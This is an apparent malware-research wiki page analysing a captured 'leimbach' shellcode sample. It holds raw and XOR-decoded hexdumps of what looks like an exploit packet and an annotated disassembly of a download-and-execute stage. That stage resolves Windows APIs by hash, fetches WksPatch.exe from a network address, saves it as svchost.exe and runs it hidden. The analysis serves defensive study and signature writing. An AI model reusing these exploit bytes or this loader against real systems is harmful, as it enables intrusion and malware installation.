leimbach Shellcode

Shellcode

raw

hexdump

00000000: 05 00 00 03 10 00 00 00 - 58 06 00 00 e5 00 00 00   ........ X.......
00000010: 40 06 00 00 01 00 04 00 - 05 00 06 00 01 00 00 00   ........ ........
00000020: 00 00 00 00 32 24 58 fd - cc 45 64 49 b0 70 dd ae   ....2.X. .EdI.p..
00000030: 74 2c 96 d2 60 5e 0d 00 - 01 00 00 00 00 00 00 00   t....... ........
00000040: 70 5e 0d 00 02 00 00 00 - 7c 5e 0d 00 00 00 00 00   p....... ........
00000050: 10 00 00 00 80 96 f1 f1 - 2a 4d ce 11 a6 6a 00 20   ........ .M...j..
00000060: af 6e 72 f4 0c 00 00 00 - 4d 41 52 42 01 00 00 00   .nr..... MARB....
00000070: 00 00 00 00 0d f0 ad ba - 00 00 00 00 a8 f4 0b 00   ........ ........
00000080: d0 05 00 00 d0 05 00 00 - 4d 45 4f 57 04 00 00 00   ........ MEOW....
00000090: a2 01 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46   ........ .......F
000000a0: 38 03 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46   8....... .......F
000000b0: 00 00 00 00 a0 05 00 00 - 98 05 00 00 00 00 00 00   ........ ........
000000c0: 01 10 08 00 cc cc cc cc - c8 00 00 00 4d 45 4f 57   ........ ....MEOW
000000d0: 98 05 00 00 d8 00 00 00 - 00 00 00 00 02 00 00 00   ........ ........
000000e0: 07 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000000f0: 00 00 00 00 c4 28 cd 00 - 64 29 cd 00 00 00 00 00   ........ d.......
00000100: 07 00 00 00 b9 01 00 00 - 00 00 00 00 c0 00 00 00   ........ ........
00000110: 00 00 00 46 ab 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000120: 00 00 00 46 a5 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000130: 00 00 00 46 a6 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000140: 00 00 00 46 a4 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000150: 00 00 00 46 ad 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000160: 00 00 00 46 aa 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000170: 00 00 00 46 07 00 00 00 - 60 00 00 00 58 00 00 00   ...F.... ....X...
00000180: 90 00 00 00 40 00 00 00 - 20 00 00 00 e8 02 00 00   ........ ........
00000190: 30 00 00 00 01 00 00 00 - 01 10 08 00 cc cc cc cc   0....... ........
000001a0: 50 00 00 00 4f b6 88 20 - ff ff ff ff 00 00 00 00   P...O... ........
000001b0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001e0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001f0: 00 00 00 00 00 00 00 00 - 01 10 08 00 cc cc cc cc   ........ ........
00000200: 48 00 00 00 07 00 66 00 - 06 09 02 00 00 00 00 00   H.....f. ........
00000210: c0 00 00 00 00 00 00 46 - 10 00 00 00 00 00 00 00   .......F ........
00000220: 00 00 00 00 01 00 00 00 - 00 00 00 00 78 19 0c 00   ........ ....x...
00000230: 58 00 00 00 05 00 06 00 - 01 00 00 00 70 d8 98 93   X....... ....p...
00000240: 98 4f d2 11 a9 3d be 57 - b2 00 00 00 32 00 31 00   .O.....W ....2.1.
00000250: 01 10 08 00 cc cc cc cc - 80 00 00 00 0d f0 ad ba   ........ ........
00000260: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
00000270: 18 43 14 00 00 00 00 00 - 60 00 00 00 60 00 00 00   .C...... ........
00000280: 4d 45 4f 57 04 00 00 00 - c0 01 00 00 00 00 00 00   MEOW.... ........
00000290: c0 00 00 00 00 00 00 46 - 3b 03 00 00 00 00 00 00   .......F ........
000002a0: c0 00 00 00 00 00 00 46 - 00 00 00 00 30 00 00 00   .......F ....0...
000002b0: 01 00 01 00 81 c5 17 03 - 80 0e e9 4a 99 99 f1 8a   ........ ...J....
000002c0: 50 6f 7a 85 02 00 00 00 - 00 00 00 00 00 00 00 00   Poz..... ........
000002d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 01 00 00 00   ........ ........
000002e0: 01 10 08 00 cc cc cc cc - 30 00 00 00 78 00 6e 00   ........ 0...x.n.
000002f0: 00 00 00 00 d8 da 0d 00 - 00 00 00 00 00 00 00 00   ........ ........
00000300: 20 2f 0c 00 00 00 00 00 - 00 00 00 00 03 00 00 00   ........ ........
00000310: 00 00 00 00 03 00 00 00 - 46 00 58 00 00 00 00 00   ........ F.X.....
00000320: 01 10 08 00 cc cc cc cc - 10 00 00 00 30 00 2e 00   ........ ....0...
00000330: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
00000340: 01 10 08 00 cc cc cc cc - 68 00 00 00 0e 00 ff ff   ........ h.......
00000350: 68 8b 0b 00 02 00 00 00 - 00 00 00 00 00 00 00 00   h....... ........
00000360: 5e 01 00 00 00 00 00 00 - 5e 01 00 00 5c 00 5c 00   ........ ........
00000370: 46 00 58 00 4e 00 42 00 - 46 00 58 00 46 00 58 00   F.X.N.B. F.X.F.X.
00000380: 4e 00 42 00 46 00 58 00 - 46 00 58 00 46 00 58 00   N.B.F.X. F.X.F.X.
00000390: 46 00 58 00 9d 13 00 01 - cc e0 fd 7f cc e0 fd 7f   F.X..... ........
000003a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
*
000004b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000004c0: 90 90 90 90 90 90 eb 0e - 5b 4b 33 c9 b1 d9 80 34   ........ .K3....4
000004d0: 0b 9a e2 fa eb 05 e8 ed - ff ff ff 73 25 9a 9a 9a   ........ ...s....
000004e0: c5 fe 3b aa 9a 9a 9a 11 - da 96 11 ea 86 37 11 f2   ........ .....7..
000004f0: 92 11 6d f0 99 c3 72 c5 - 9a 9a 9a 78 63 f2 f5 f4   ..m...r. ...xc...
00000500: 9a 9a f2 ef e8 f6 f7 ce - 65 8c 11 72 72 d3 9a 9a   ........ e..rr...
00000510: 9a 11 64 19 5d 8a cd 1a - ad 03 dd 1a a5 8b ef 6d   ..d..... .......m
00000520: 1a ad 8b c5 19 76 8e f2 - ff e2 ff 9a f2 f5 e9 ee   .....v.. ........
00000530: b4 f2 e9 ec f9 f2 f2 ff - e8 e9 c6 f2 fe e8 f3 ec   ........ ........
00000540: 11 46 a9 5a ca ca c9 cd - ca 65 cc 96 1f 5a ef 9d   .F.Z.... .e...Z..
00000550: 11 46 ca c9 65 cc 9e 65 - cc 92 cb cc 11 df a6 11   .F..e..e ........
00000560: ce b2 e2 99 4f c8 11 e8 - ba 99 6f a9 53 d3 db 37   ....O... ..o.S..7
00000570: 99 5f a9 41 95 24 8a a0 - 4c ee 92 5b 51 97 99 40   ...A.... L...Q...
00000580: da 71 6b a1 85 ef 7d c0 - 11 c0 be 99 47 fc 11 96   .qk..... ....G...
00000590: d1 11 c0 86 99 47 11 9e - 11 99 5f 31 c4 c3 59 72   .....G.. ...1..Yr
000005a0: a6 65 65 65 14 d4 94 76 - 02 64 10 94 75 54 7a fa   .eee...v .d..uTz.
000005b0: ac 80 b5 ea f1 ed ed e9 - a3 b6 b6 a8 a0 ab b7 a8   ........ ........
000005c0: af a1 b7 a8 b7 ab a3 ab - ab ab a8 a0 b6 ce f2 ea   ........ ........
000005d0: c9 f8 ed fa f1 b7 fc e1 - fc 11 88 88 88 88 90 90   ........ ........
000005e0: 90 90 90 90 90 90 90 90 - 90 90 90 00 5c 00 43 00   ........ ......C.
000005f0: 24 00 5c 00 31 00 32 00 - 33 00 34 00 35 00 36 00   ....1.2. 3.4.5.6.
00000600: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 31 00   1.1.1.1. 1.1.1.1.
00000610: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 2e 00   1.1.1.1. 1.1.1...
00000620: 64 00 6f 00 63 00 00 00 - 01 10 08 00 cc cc cc cc   d.o.c... ........
00000630: 20 00 00 00 30 00 2d 00 - 00 00 00 00 88 2a 0c 00   ....0... ........
00000640: 02 00 00 00 01 00 00 00 - 28 8c 0c 00 01 00 00 00   ........ ........
00000650: 07 00 00 00 00 00 00 00 - 00                        ........ .

unxor'd

00000000: 05 00 00 03 10 00 00 00 - 58 06 00 00 e5 00 00 00   ........ X.......
00000010: 40 06 00 00 01 00 04 00 - 05 00 06 00 01 00 00 00   ........ ........
00000020: 00 00 00 00 32 24 58 fd - cc 45 64 49 b0 70 dd ae   ....2.X. .EdI.p..
00000030: 74 2c 96 d2 60 5e 0d 00 - 01 00 00 00 00 00 00 00   t....... ........
00000040: 70 5e 0d 00 02 00 00 00 - 7c 5e 0d 00 00 00 00 00   p....... ........
00000050: 10 00 00 00 80 96 f1 f1 - 2a 4d ce 11 a6 6a 00 20   ........ .M...j..
00000060: af 6e 72 f4 0c 00 00 00 - 4d 41 52 42 01 00 00 00   .nr..... MARB....
00000070: 00 00 00 00 0d f0 ad ba - 00 00 00 00 a8 f4 0b 00   ........ ........
00000080: d0 05 00 00 d0 05 00 00 - 4d 45 4f 57 04 00 00 00   ........ MEOW....
00000090: a2 01 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46   ........ .......F
000000a0: 38 03 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46   8....... .......F
000000b0: 00 00 00 00 a0 05 00 00 - 98 05 00 00 00 00 00 00   ........ ........
000000c0: 01 10 08 00 cc cc cc cc - c8 00 00 00 4d 45 4f 57   ........ ....MEOW
000000d0: 98 05 00 00 d8 00 00 00 - 00 00 00 00 02 00 00 00   ........ ........
000000e0: 07 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000000f0: 00 00 00 00 c4 28 cd 00 - 64 29 cd 00 00 00 00 00   ........ d.......
00000100: 07 00 00 00 b9 01 00 00 - 00 00 00 00 c0 00 00 00   ........ ........
00000110: 00 00 00 46 ab 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000120: 00 00 00 46 a5 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000130: 00 00 00 46 a6 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000140: 00 00 00 46 a4 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000150: 00 00 00 46 ad 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000160: 00 00 00 46 aa 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000170: 00 00 00 46 07 00 00 00 - 60 00 00 00 58 00 00 00   ...F.... ....X...
00000180: 90 00 00 00 40 00 00 00 - 20 00 00 00 e8 02 00 00   ........ ........
00000190: 30 00 00 00 01 00 00 00 - 01 10 08 00 cc cc cc cc   0....... ........
000001a0: 50 00 00 00 4f b6 88 20 - ff ff ff ff 00 00 00 00   P...O... ........
000001b0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001e0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001f0: 00 00 00 00 00 00 00 00 - 01 10 08 00 cc cc cc cc   ........ ........
00000200: 48 00 00 00 07 00 66 00 - 06 09 02 00 00 00 00 00   H.....f. ........
00000210: c0 00 00 00 00 00 00 46 - 10 00 00 00 00 00 00 00   .......F ........
00000220: 00 00 00 00 01 00 00 00 - 00 00 00 00 78 19 0c 00   ........ ....x...
00000230: 58 00 00 00 05 00 06 00 - 01 00 00 00 70 d8 98 93   X....... ....p...
00000240: 98 4f d2 11 a9 3d be 57 - b2 00 00 00 32 00 31 00   .O.....W ....2.1.
00000250: 01 10 08 00 cc cc cc cc - 80 00 00 00 0d f0 ad ba   ........ ........
00000260: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
00000270: 18 43 14 00 00 00 00 00 - 60 00 00 00 60 00 00 00   .C...... ........
00000280: 4d 45 4f 57 04 00 00 00 - c0 01 00 00 00 00 00 00   MEOW.... ........
00000290: c0 00 00 00 00 00 00 46 - 3b 03 00 00 00 00 00 00   .......F ........
000002a0: c0 00 00 00 00 00 00 46 - 00 00 00 00 30 00 00 00   .......F ....0...
000002b0: 01 00 01 00 81 c5 17 03 - 80 0e e9 4a 99 99 f1 8a   ........ ...J....
000002c0: 50 6f 7a 85 02 00 00 00 - 00 00 00 00 00 00 00 00   Poz..... ........
000002d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 01 00 00 00   ........ ........
000002e0: 01 10 08 00 cc cc cc cc - 30 00 00 00 78 00 6e 00   ........ 0...x.n.
000002f0: 00 00 00 00 d8 da 0d 00 - 00 00 00 00 00 00 00 00   ........ ........
00000300: 20 2f 0c 00 00 00 00 00 - 00 00 00 00 03 00 00 00   ........ ........
00000310: 00 00 00 00 03 00 00 00 - 46 00 58 00 00 00 00 00   ........ F.X.....
00000320: 01 10 08 00 cc cc cc cc - 10 00 00 00 30 00 2e 00   ........ ....0...
00000330: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
00000340: 01 10 08 00 cc cc cc cc - 68 00 00 00 0e 00 ff ff   ........ h.......
00000350: 68 8b 0b 00 02 00 00 00 - 00 00 00 00 00 00 00 00   h....... ........
00000360: 5e 01 00 00 00 00 00 00 - 5e 01 00 00 5c 00 5c 00   ........ ........
00000370: 46 00 58 00 4e 00 42 00 - 46 00 58 00 46 00 58 00   F.X.N.B. F.X.F.X.
00000380: 4e 00 42 00 46 00 58 00 - 46 00 58 00 46 00 58 00   N.B.F.X. F.X.F.X.
00000390: 46 00 58 00 9d 13 00 01 - cc e0 fd 7f cc e0 fd 7f   F.X..... ........
000003a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
*
000004b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000004c0: 90 90 90 90 90 90 eb 0e - 5b 4b 33 c9 b1 d9 80 34   ........ .K3....4
000004d0: 0b 9a e2 fa eb 05 e8 ed - ff ff ff e9 bf 00 00 00   ........ ........
000004e0: 5f 64 a1 30 00 00 00 8b - 40 0c 8b 70 1c ad 8b 68   .d.0.... ...p...h
000004f0: 08 8b f7 6a 03 59 e8 5f - 00 00 00 e2 f9 68 6f 6e   ...j.Y.. .....hon
00000500: 00 00 68 75 72 6c 6d 54 - ff 16 8b e8 e8 49 00 00   ..hurlmT .....I..
00000510: 00 8b fe 83 c7 10 57 80 - 37 99 47 80 3f 11 75 f7   ......W. 7.G...u.
00000520: 80 37 11 5f 83 ec 14 68 - 65 78 65 00 68 6f 73 74   .7.....h exe.host
00000530: 2e 68 73 76 63 68 68 65 - 72 73 5c 68 64 72 69 76   .hsvchhe rs.hdriv
00000540: 8b dc 33 c0 50 50 53 57 - 50 ff 56 0c 85 c0 75 07   ..3.PPSW P.V...u.
00000550: 8b dc 50 53 ff 56 04 ff - 56 08 51 56 8b 45 3c 8b   ..PS.V.. V.QV.E..
00000560: 54 28 78 03 d5 52 8b 72 - 20 03 f5 33 c9 49 41 ad   T.x..R.r ...3.IA.
00000570: 03 c5 33 db 0f be 10 3a - d6 74 08 c1 cb 0d 03 da   ..3..... .t......
00000580: 40 eb f1 3b 1f 75 e7 5a - 8b 5a 24 03 dd 66 8b 0c   .....u.Z .Z...f..
00000590: 4b 8b 5a 1c 03 dd 8b 04 - 8b 03 c5 ab 5e 59 c3 e8   K.Z..... .....Y..
000005a0: 3c ff ff ff 8e 4e 0e ec - 98 fe 8a 0e ef ce e0 60   .....N.. ........
000005b0: 36 1a 2f 70 68 74 74 70 - 3a 2f 2f 31 39 32 2e 31   6..phttp ...192.1
000005c0: 36 38 2e 31 2e 32 3a 32 - 32 32 31 39 2f 57 6b 73   68.1.2.2 2219.Wks
000005d0: 50 61 74 63 68 2e 65 78 - 65 00 88 88 88 88 90 90   Patch.ex e.......
000005e0: 90 90 90 90 90 90 90 90 - 90 90 90 00 5c 00 43 00   ........ ......C.
000005f0: 24 00 5c 00 31 00 32 00 - 33 00 34 00 35 00 36 00   ....1.2. 3.4.5.6.
00000600: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 31 00   1.1.1.1. 1.1.1.1.
00000610: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 2e 00   1.1.1.1. 1.1.1...
00000620: 64 00 6f 00 63 00 00 00 - 01 10 08 00 cc cc cc cc   d.o.c... ........
00000630: 20 00 00 00 30 00 2d 00 - 00 00 00 00 88 2a 0c 00   ....0... ........
00000640: 02 00 00 00 01 00 00 00 - 28 8c 0c 00 01 00 00 00   ........ ........
00000650: 07 00 00 00 00 00 00 00 - 00                        ........ .

Analysis

XOR decoder "leimbach xor"

000004C6                 jmp     short loc_4D6   ; go to the call so the stub can learn its own address
000004C8 ; ---------------------------------------------------------------------------
000004C8 ; First decoding layer: XOR 0x9A over the 217 bytes at 4DB..5B3, i.e. the
000004C8 ; body and the four hash dwords. The URL at 5B4 is NOT in this range; it
000004C8 ; carries a second, separate XOR 0x99 layer removed at runtime by loc_517.
000004C8 ; Entered through "call loc_4C8", so the return address on the stack is 4DB.
000004C8
000004C8 loc_4C8:
000004C8                 pop     ebx             ; ebx = 4DB, address pushed by the call at 4D6
000004C9                 dec     ebx             ; ebx = 4DA, so [ebx+ecx] for ecx = D9..1 spans 4DB..5B3
000004CA                 xor     ecx, ecx
000004CC                 mov     cl, 0D9h ; ecx = 217 bytes to decode
000004CE
000004CE loc_4CE:
000004CE                 xor     byte ptr [ebx+ecx], 9Ah ; decode one byte, walking from the end backwards
000004D2                 loop    loc_4CE         ; dec ecx / jnz: last byte touched is [ebx+1] = 4DB
000004D4                 jmp     short loc_4DB   ; 4DB is the first decoded instruction
000004D6 ; ---------------------------------------------------------------------------
000004D6
000004D6 loc_4D6:
000004D6                 call    loc_4C8         ; pushes 4DB and enters the decoder
000004DB
000004DB loc_4DB:
000004DB                 jmp     loc_59F         ; raw bytes 73 25 9a 9a 9a, decoded to e9 bf 00 00 00

unxor'd shellcode

000004E0 ; Decoded payload body: a download-and-execute stage.
000004E0 ; Resolves LoadLibraryA/WinExec/ExitThread from kernel32 and
000004E0 ; URLDownloadToFileA from urlmon by name hash, decodes the URL, fetches it
000004E0 ; to "drivers\svchost.exe" and runs it. Reached via "call loc_4E0" at 59F,
000004E0 ; so the return address on the stack is 5A4, the start of the hash table.
000004E0 ; Register roles: edi/esi = hash table (becomes the resolved-import table),
000004E0 ; ebp = base of the module being searched by getImportByHash.
000004E0 loc_4E0:
000004E0                 pop     edi             ; edi = 5A4, the hash table (pushed by the call at 59F)
000004E1                 mov     eax, large fs:30h ; eax = PEB (TEB+0x30)
000004E7                 mov     eax, [eax+0Ch]  ; eax = PEB.Ldr
000004EA                 mov     esi, [eax+1Ch]  ; esi = InInitializationOrderModuleList.Flink (1st entry's links)
000004ED                 lodsd                   ; eax = that entry's Flink -> 2nd entry in init order
000004EE                 mov     ebp, [eax+8]    ; ebp = its DllBase; kernel32.dll on XP-era Windows,
000004EE                                         ; later versions order this list differently (not verified here)
000004F1                 mov     esi, edi        ; esi = hash/import table base; edi walks it
000004F3                 push    3               ; ecx = 3 (push/pop form avoids NUL bytes in the immediate)
000004F5                 pop     ecx
000004F6
000004F6 loc_4F6:                                ; resolve the three kernel32 hashes; each call advances edi by 4
000004F6                 call    getImportByHash ; preserves ecx, so the loop counter survives
000004FB                 loop    loc_4F6
000004FD                 push    'no'            ; two little-endian dwords build "urlmon\0\0" on the stack
00000502                 push    'mlru'
00000507                 push    esp             ; lpLibFileName -> "urlmon"
00000508                 call    dword ptr [esi] ; LoadLibraryA("urlmon")
0000050A                 mov     ebp, eax        ; ebp = urlmon base: next lookup searches urlmon's exports
0000050C                 call    getImportByHash ; resolves the 4th hash, URLDownloadToFileA, into [esi+0Ch]
00000511                 mov     edi, esi
00000513                 add     edi, 10h        ; edi = esi+10h = 5B4, the encoded URL string
00000516                 push    edi             ; keep the URL pointer across the decode loop
00000517
00000517 loc_517:                                ; second decoding layer for the URL only: XOR 0x99
00000517                 xor     byte ptr [edi], 99h
0000051A                 inc     edi
0000051B                 cmp     byte ptr [edi], 11h ; 0x11 marks the end of the encoded string
0000051E                 jnz     short loc_517
00000520                 xor     byte ptr [edi], 11h ; turn the 0x11 terminator into the NUL terminator
00000523                 pop     edi             ; edi = decoded URL
00000524                 sub     esp, 14h        ; 20 bytes of scratch above the path string; purpose not evident from the listing
00000527                 push    'exe'           ; five pushes build "drivers\svchost.exe\0" on the stack;
0000052C                 push    '.tso'          ; the path is relative, so it resolves against the
00000531                 push    'hcvs'          ; exploited process's current directory
00000536                 push    '\sre'
0000053B                 push    'vird'
00000540                 mov     ebx, esp        ; ebx -> "drivers\svchost.exe"
00000542                 xor     eax, eax
00000544                 push    eax             ; lpfnCB = NULL
00000545                 push    eax             ; dwReserved = 0
00000546                 push    ebx             ; szFileName -> "drivers\svchost.exe"
00000547                 push    edi             ; szURL -> decoded URL
00000548                 push    eax             ; pCaller = NULL
00000549                 call    dword ptr [esi+0Ch] ; URLDownloadToFileA(NULL, url, path, 0, NULL); stdcall pops the 5 args
0000054C                 test    eax, eax        ; HRESULT != S_OK ...
0000054E                 jnz     short loc_557   ; ... -> skip execution, ExitThread
00000550                 mov     ebx, esp        ; esp is back at the path string after the stdcall cleanup
00000552                 push    eax             ; uCmdShow = 0 (SW_HIDE)
00000553                 push    ebx             ; lpCmdLine -> "drivers\svchost.exe"
00000554                 call    dword ptr [esi+4] ; WinExec("drivers\svchost.exe", SW_HIDE)
00000557
00000557 loc_557:                                ; ExitThread
00000557                 call    dword ptr [esi+8] ; dwExitCode is whatever dword sits on top of the stack (the path bytes)
0000055A
0000055A ; =============== S U B R O U T I N E =======================================
0000055A
0000055A
0000055A ; getImportByHash: resolve one export of the module at ebp by name hash and
0000055A ; patch its address into the hash table in place.
0000055A ; In:    ebp = module base (kernel32 for the first three calls, urlmon for the fourth)
0000055A ;        edi -> dword holding the ROR-13 hash of the wanted export name
0000055A ; Out:   [edi] = export address (hash overwritten via stosd); edi += 4
0000055A ; Keeps: ecx (caller's loop counter), esi (caller's table pointer)
0000055A ; Clobb: eax, ebx, edx, flags
0000055A ; Hash:  h = ror(h, 13) + c over each byte of the name, starting from 0.
0000055A ; Note:  NumberOfNames is never consulted, so a hash with no match walks
0000055A ;        past the end of the name table instead of failing cleanly.
0000055A getImportByHash proc near
0000055A                 push    ecx             ; preserve caller's loop counter
0000055B                 push    esi             ; preserve caller's table pointer
0000055C                 mov     eax, [ebp+3Ch]  ; eax = e_lfanew
0000055F                 mov     edx, [eax+ebp+78h] ; edx = DataDirectory[0].VirtualAddress (export dir RVA, PE32 layout)
00000563                 add     edx, ebp        ; edx = IMAGE_EXPORT_DIRECTORY
00000565                 push    edx             ; saved for the ordinal/address lookup below
00000566                 mov     esi, [edx+20h]  ; esi = AddressOfNames RVA ...
00000569                 add     esi, ebp        ; ... made a pointer
0000056B                 xor     ecx, ecx
0000056D                 dec     ecx             ; ecx = -1, name index (pre-incremented below)
0000056E
0000056E loc_56E:                                ; next export name
0000056E                 inc     ecx
0000056F                 lodsd                   ; eax = name RVA
00000570                 add     eax, ebp        ; eax -> ASCII name
00000572                 xor     ebx, ebx        ; ebx = running hash
00000574
00000574 loc_574:                                ; hash one character
00000574                 movsx   edx, byte ptr [eax]
00000577                 cmp     dl, dh          ; dh is 0 after movsx of an ASCII byte, so this is a NUL test
00000579                 jz      short loc_583
0000057B                 ror     ebx, 0Dh        ; h = ror(h, 13) + c
0000057E                 add     ebx, edx
00000580                 inc     eax
00000581                 jmp     short loc_574
00000583 ; ---------------------------------------------------------------------------
00000583
00000583 loc_583:
00000583                 cmp     ebx, [edi]      ; matches the wanted hash?
00000585                 jnz     short loc_56E   ; no: try the next name
00000587                 pop     edx             ; edx = IMAGE_EXPORT_DIRECTORY
00000588                 mov     ebx, [edx+24h]  ; AddressOfNameOrdinals
0000058B                 add     ebx, ebp
0000058D                 mov     cx, [ebx+ecx*2] ; cx = ordinal; upper half of ecx is already zero for any realistic index
00000591                 mov     ebx, [edx+1Ch]  ; AddressOfFunctions
00000594                 add     ebx, ebp
00000596                 mov     eax, [ebx+ecx*4] ; function RVA ...
00000599                 add     eax, ebp        ; ... made a pointer
0000059B                 stosd                   ; overwrite the hash at [edi] with the address, edi += 4
0000059C                 pop     esi
0000059D                 pop     ecx
0000059E                 retn
0000059E getImportByHash endp
0000059E
0000059F ; ---------------------------------------------------------------------------
0000059F
0000059F ; Entry after the first decoding layer: the call pushes 5A4, the address of
0000059F ; the hash table that follows, which loc_4E0 pops into edi.
0000059F loc_59F:
0000059F                 call    loc_4E0
0000059F ; ---------------------------------------------------------------------------
0000059F ; Import hash table. Each dword is the ROR-13 hash of an export name and is
0000059F ; overwritten in place with the resolved address by getImportByHash, so at
0000059F ; runtime [esi] .. [esi+0Ch] become the four function pointers used above.
0000059F ; Detection note: these four constants are the widely reused ROR-13 hashes
0000059F ; of the named APIs and make good static signature material, as does the
0000059F ; XOR-0x99 URL that follows them.
000005A4                 dd 0EC0E4E8Eh           ; LoadLibraryA (kernel32)        -> [esi]
000005A8                 dd 0E8AFE98h            ; WinExec (kernel32)             -> [esi+4]
000005AC                 dd 60E0CEEFh            ; ExitThread (kernel32)          -> [esi+8]
000005B0                 dd 702F1A36h            ; URLDownloadToFileA (urlmon)    -> [esi+0Ch]
000005B4 aHttp192_168_1_ db 'http://192.168.1.2:22219/WksPatch.exe',0 ; [esi+10h]; shown in clear because this listing appears to come from the "unxor'd" dump -- in the raw sample it is XOR 0x99 with a 0x11 terminator (see raw bytes at 5B4..5D9) and is decoded by loc_517

shellcode patterns

xor


bindshell

 
 
csni/shellcodes/leimbach.txt · Last modified: 2006/02/17 14:01
 